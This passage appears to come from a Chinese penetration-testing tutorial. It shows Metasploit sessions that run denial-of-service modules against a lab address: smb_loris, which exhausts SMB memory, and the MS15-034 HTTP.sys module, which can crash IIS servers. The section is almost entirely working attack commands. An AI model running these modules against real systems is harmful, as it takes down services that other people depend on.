0x08 一些拒绝攻击模块

对SMB协议

# 先将攻击机的网络连接数设置到最大
ulimit -n 65535

# 使用smb_loris,会导致目标机器的内存使用率增大
msf > use auxiliary/dos/smb/smb_loris 
msf auxiliary(dos/smb/smb_loris) > show options 

Module options (auxiliary/dos/smb/smb_loris):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   rhost                   yes       The target address
   rport  445              yes       SMB port on the target

msf auxiliary(dos/smb/smb_loris) > set rhost 192.168.10.122
rhost => 192.168.10.122
msf auxiliary(dos/smb/smb_loris) > run

HTTP.sys的安全漏洞

编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃

msf > use auxiliary/dos/http/ms15_034_ulonglongadd 
msf auxiliary(dos/http/ms15_034_ulonglongadd) > show options 

Module options (auxiliary/dos/http/ms15_034_ulonglongadd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.122
rhosts => 192.168.10.122
msf auxiliary(dos/http/ms15_034_ulonglongadd) > run

你可能感兴趣的:(0x08 一些拒绝攻击模块)